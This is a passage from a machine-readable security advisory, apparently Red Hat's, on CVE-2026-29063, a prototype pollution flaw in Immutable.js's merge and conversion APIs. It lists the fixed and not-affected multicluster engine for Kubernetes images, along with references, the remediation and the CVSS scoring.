"text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "RHBZ#2445291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
}
],
"release_date": "2026-03-06T18:25:22.438000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
